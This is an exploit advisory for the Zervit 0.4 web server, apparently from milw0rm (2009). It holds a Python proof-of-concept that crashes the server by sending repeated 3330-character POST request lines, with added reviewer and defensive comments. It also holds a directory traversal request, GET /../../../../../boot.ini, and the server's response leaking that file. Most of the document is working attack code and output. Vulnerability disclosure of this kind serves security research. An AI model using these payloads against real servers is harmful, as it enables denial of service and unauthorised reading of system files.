####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption #########
By: e.wiZz! & shinnai
Site: shinnai.net & balcansecurity.com
[Memory Corruption]
########################################################################
import socket
# Proof-of-concept for the "[Memory Corruption]" issue, written for Python 2
# (raw_input, and a str handed to socket.send).
# NOTE(review): the listing lost its indentation; the loop body is assumed to
# run through the send() call — confirm against the original advisory.

# Loopback address: the script is aimed at a server on the tester's own machine.
host = "127.0.0.1"
port = 8080

try:
    # The payload is the same on every pass, so it is assembled once: a POST
    # request line whose request target is 3330 "a" characters. No headers and
    # no line terminator follow it; the oversized request line is all that is
    # sent.
    # Defensive takeaway: a server should cap the request-line length before
    # copying it, and answer an over-long one with 414 instead of parsing it.
    buff = "a" * 3330
    request = "".join(["POST ", buff, " HTTP/1.0"])

    # Nine separate connections, each carrying the same request. The sockets
    # are never closed explicitly.
    for i in range(1, 10):
        connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connection.connect((host, port))
        connection.send(request)
except:
    # Bare except: any failure in the block above ends up here and is reported
    # as a connection failure, whatever its real cause.
    raw_input('\n\nUnable to connect. Press "Enter" to quit...')
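[Directory traversal]
The request path below climbs out of the document root with repeated "../" segments, and the 200 response carries the contents of boot.ini. The server therefore appears to map the request path onto the filesystem without first normalising it and checking that the result stays inside the web root.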
#################################################################################
[Request]
GET /../../../../../boot.ini HTTP/1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
Host: localhost:80
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
#################################################
[Response]
HTTP/1.1 200 OK
Server: Zervit 0.4
X-Powered-By: Carbono
Connection: close
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 355
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
##################################################
# milw0rm.com [2009-05-13]